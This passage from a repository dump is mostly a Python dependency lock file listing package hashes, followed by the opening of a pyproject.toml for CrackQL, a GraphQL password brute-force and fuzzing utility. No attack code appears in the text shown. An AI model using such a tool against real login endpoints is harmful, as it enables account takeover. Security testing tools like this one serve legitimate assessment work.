"sha256:4dc8f9fb58f7364b63fd9f85013b780ef83c11857ae79f2feda41e270468dd9b"}, 130 | {file = "MarkupSafe-2.0.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:20dca64a3ef2d6e4d5d615a3fd418ad3bde77a47ec8a23d984a12b5b4c74491a"}, 131 | {file = "MarkupSafe-2.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:cdfba22ea2f0029c9261a4bd07e830a8da012291fbe44dc794e488b6c9bb353a"}, 132 | {file = "MarkupSafe-2.0.1-cp310-cp310-win32.whl", hash = "sha256:99df47edb6bda1249d3e80fdabb1dab8c08ef3975f69aed437cb69d0a5de1e28"}, 133 | {file = "MarkupSafe-2.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:e0f138900af21926a02425cf736db95be9f4af72ba1bb21453432a07f6082134"}, 134 | {file = "MarkupSafe-2.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:f9081981fe268bd86831e5c75f7de206ef275defcb82bc70740ae6dc507aee51"}, 135 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_i686.whl", hash = "sha256:0955295dd5eec6cb6cc2fe1698f4c6d84af2e92de33fbcac4111913cd100a6ff"}, 136 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux1_x86_64.whl", hash = "sha256:0446679737af14f45767963a1a9ef7620189912317d095f2d9ffa183a4d25d2b"}, 137 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_i686.whl", hash = "sha256:f826e31d18b516f653fe296d967d700fddad5901ae07c622bb3705955e1faa94"}, 138 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2010_x86_64.whl", hash = "sha256:fa130dd50c57d53368c9d59395cb5526eda596d3ffe36666cd81a44d56e48872"}, 139 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux2014_aarch64.whl", hash = "sha256:905fec760bd2fa1388bb5b489ee8ee5f7291d692638ea5f67982d968366bef9f"}, 140 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:bf5d821ffabf0ef3533c39c518f3357b171a1651c1ff6827325e4489b0e46c3c"}, 141 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:0d4b31cc67ab36e3392bbf3862cfbadac3db12bdd8b02a2731f509ed5b829724"}, 142 | {file = "MarkupSafe-2.0.1-cp36-cp36m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:baa1a4e8f868845af802979fcdbf0bb11f94f1cb7ced4c4b8a351bb60d108145"}, 143 | {file = "MarkupSafe-2.0.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:deb993cacb280823246a026e3b2d81c493c53de6acfd5e6bfe31ab3402bb37dd"}, 144 | {file = "MarkupSafe-2.0.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:63f3268ba69ace99cab4e3e3b5840b03340efed0948ab8f78d2fd87ee5442a4f"}, 145 | {file = "MarkupSafe-2.0.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:8d206346619592c6200148b01a2142798c989edcb9c896f9ac9722a99d4e77e6"}, 146 | {file = "MarkupSafe-2.0.1-cp36-cp36m-win32.whl", hash = "sha256:6c4ca60fa24e85fe25b912b01e62cb969d69a23a5d5867682dd3e80b5b02581d"}, 147 | {file = "MarkupSafe-2.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:b2f4bf27480f5e5e8ce285a8c8fd176c0b03e93dcc6646477d4630e83440c6a9"}, 148 | {file = "MarkupSafe-2.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:0717a7390a68be14b8c793ba258e075c6f4ca819f15edfc2a3a027c823718567"}, 149 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_i686.whl", hash = "sha256:6557b31b5e2c9ddf0de32a691f2312a32f77cd7681d8af66c2692efdbef84c18"}, 150 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux1_x86_64.whl", hash = "sha256:49e3ceeabbfb9d66c3aef5af3a60cc43b85c33df25ce03d0031a608b0a8b2e3f"}, 151 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_i686.whl", hash = "sha256:d7f9850398e85aba693bb640262d3611788b1f29a79f0c93c565694658f4071f"}, 152 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2010_x86_64.whl", hash = "sha256:6a7fae0dd14cf60ad5ff42baa2e95727c3d81ded453457771d02b7d2b3f9c0c2"}, 153 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:b7f2d075102dc8c794cbde1947378051c4e5180d52d276987b8d28a3bd58c17d"}, 154 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e9936f0b261d4df76ad22f8fee3ae83b60d7c3e871292cd42f40b81b70afae85"}, 155 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:2a7d351cbd8cfeb19ca00de495e224dea7e7d919659c2841bbb7f420ad03e2d6"}, 156 | {file = "MarkupSafe-2.0.1-cp37-cp37m-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:60bf42e36abfaf9aff1f50f52644b336d4f0a3fd6d8a60ca0d054ac9f713a864"}, 157 | {file = "MarkupSafe-2.0.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:d6c7ebd4e944c85e2c3421e612a7057a2f48d478d79e61800d81468a8d842207"}, 158 | {file = "MarkupSafe-2.0.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:f0567c4dc99f264f49fe27da5f735f414c4e7e7dd850cfd8e69f0862d7c74ea9"}, 159 | {file = "MarkupSafe-2.0.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:89c687013cb1cd489a0f0ac24febe8c7a666e6e221b783e53ac50ebf68e45d86"}, 160 | {file = "MarkupSafe-2.0.1-cp37-cp37m-win32.whl", hash = "sha256:a30e67a65b53ea0a5e62fe23682cfe22712e01f453b95233b25502f7c61cb415"}, 161 | {file = "MarkupSafe-2.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:611d1ad9a4288cf3e3c16014564df047fe08410e628f89805e475368bd304914"}, 162 | {file = "MarkupSafe-2.0.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:5bb28c636d87e840583ee3adeb78172efc47c8b26127267f54a9c0ec251d41a9"}, 163 | {file = "MarkupSafe-2.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:be98f628055368795d818ebf93da628541e10b75b41c559fdf36d104c5787066"}, 164 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_i686.whl", hash = "sha256:1d609f577dc6e1aa17d746f8bd3c31aa4d258f4070d61b2aa5c4166c1539de35"}, 165 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux1_x86_64.whl", hash = "sha256:7d91275b0245b1da4d4cfa07e0faedd5b0812efc15b702576d103293e252af1b"}, 166 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_i686.whl", hash = "sha256:01a9b8ea66f1658938f65b93a85ebe8bc016e6769611be228d797c9d998dd298"}, 167 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2010_x86_64.whl", hash = "sha256:47ab1e7b91c098ab893b828deafa1203de86d0bc6ab587b160f78fe6c4011f75"}, 168 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:97383d78eb34da7e1fa37dd273c20ad4320929af65d156e35a5e2d89566d9dfb"}, 169 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6fcf051089389abe060c9cd7caa212c707e58153afa2c649f00346ce6d260f1b"}, 170 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:5855f8438a7d1d458206a2466bf82b0f104a3724bf96a1c781ab731e4201731a"}, 171 | {file = "MarkupSafe-2.0.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:3dd007d54ee88b46be476e293f48c85048603f5f516008bee124ddd891398ed6"}, 172 | {file = "MarkupSafe-2.0.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:aca6377c0cb8a8253e493c6b451565ac77e98c2951c45f913e0b52facdcff83f"}, 173 | {file = "MarkupSafe-2.0.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:04635854b943835a6ea959e948d19dcd311762c5c0c6e1f0e16ee57022669194"}, 174 | {file = "MarkupSafe-2.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:6300b8454aa6930a24b9618fbb54b5a68135092bc666f7b06901f897fa5c2fee"}, 175 | {file = "MarkupSafe-2.0.1-cp38-cp38-win32.whl", hash = "sha256:023cb26ec21ece8dc3907c0e8320058b2e0cb3c55cf9564da612bc325bed5e64"}, 176 | {file = "MarkupSafe-2.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:984d76483eb32f1bcb536dc27e4ad56bba4baa70be32fa87152832cdd9db0833"}, 177 | {file = "MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:2ef54abee730b502252bcdf31b10dacb0a416229b72c18b19e24a4509f273d26"}, 178 | {file = "MarkupSafe-2.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:3c112550557578c26af18a1ccc9e090bfe03832ae994343cfdacd287db6a6ae7"}, 179 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_i686.whl", hash = "sha256:53edb4da6925ad13c07b6d26c2a852bd81e364f95301c66e930ab2aef5b5ddd8"}, 180 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux1_x86_64.whl", hash = "sha256:f5653a225f31e113b152e56f154ccbe59eeb1c7487b39b9d9f9cdb58e6c79dc5"}, 181 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_i686.whl", hash = "sha256:4efca8f86c54b22348a5467704e3fec767b2db12fc39c6d963168ab1d3fc9135"}, 182 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2010_x86_64.whl", hash = "sha256:ab3ef638ace319fa26553db0624c4699e31a28bb2a835c5faca8f8acf6a5a902"}, 183 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:f8ba0e8349a38d3001fae7eadded3f6606f0da5d748ee53cc1dab1d6527b9509"}, 184 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:c47adbc92fc1bb2b3274c4b3a43ae0e4573d9fbff4f54cd484555edbf030baf1"}, 185 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_12_i686.manylinux2010_i686.whl", hash = "sha256:37205cac2a79194e3750b0af2a5720d95f786a55ce7df90c3af697bfa100eaac"}, 186 | {file = "MarkupSafe-2.0.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:1f2ade76b9903f39aa442b4aadd2177decb66525062db244b35d71d0ee8599b6"}, 187 | {file = "MarkupSafe-2.0.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4296f2b1ce8c86a6aea78613c34bb1a672ea0e3de9c6ba08a960efe0b0a09047"}, 188 | {file = "MarkupSafe-2.0.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9f02365d4e99430a12647f09b6cc8bab61a6564363f313126f775eb4f6ef798e"}, 189 | {file = "MarkupSafe-2.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:5b6d930f030f8ed98e3e6c98ffa0652bdb82601e7a016ec2ab5d7ff23baa78d1"}, 190 | {file = "MarkupSafe-2.0.1-cp39-cp39-win32.whl", hash = "sha256:10f82115e21dc0dfec9ab5c0223652f7197feb168c940f3ef61563fc2d6beb74"}, 191 | {file = "MarkupSafe-2.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:693ce3f9e70a6cf7d2fb9e6c9d8b204b6b39897a2c4a1aa65728d5ac97dcc1d8"}, 192 | {file = "MarkupSafe-2.0.1.tar.gz", hash = "sha256:594c67807fb16238b30c44bdf74f36c02cdf22d1c8cda91ef8a0ed8dabf5620a"}, 193 | ] 194 | requests = [ 195 | {file = "requests-2.27.1-py2.py3-none-any.whl", hash = "sha256:f22fa1e554c9ddfd16e6e41ac79759e17be9e492b3587efa038054674760e72d"}, 196 | {file = "requests-2.27.1.tar.gz", hash = "sha256:68d7c56fd5a8999887728ef304a6d12edc7be74f1cfa47714fc8b414525c9a61"}, 197 | ] 198 | typing-extensions = [ 199 | {file = "typing_extensions-4.1.1-py3-none-any.whl", hash = "sha256:21c85e0fe4b9a155d0799430b0ad741cdce7e359660ccbd8b530613e8df88ce2"}, 200 | {file = "typing_extensions-4.1.1.tar.gz", hash = "sha256:1a9462dcc3347a79b1f1c0271fbe79e844580bb598bafa1ed208b94da3cdcd42"}, 201 | ] 202 | urllib3 = [ 203 | {file = "urllib3-1.26.11-py2.py3-none-any.whl", hash = "sha256:c33ccba33c819596124764c23a97d25f32b28433ba0dedeb77d873a38722c9bc"}, 204 | {file = "urllib3-1.26.11.tar.gz", hash = "sha256:ea6e8fb210b19d950fab93b60c9009226c63a28808bc8386e05301e25883ac0a"}, 205 | ] 206 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | [tool.poetry] 2 | name = "CrackQL" 3 | version = "1.0" 4 | description = "CrackQL is a GraphQL password brute-force and fuzzing utility." 5 | authors = ["Nick Aleks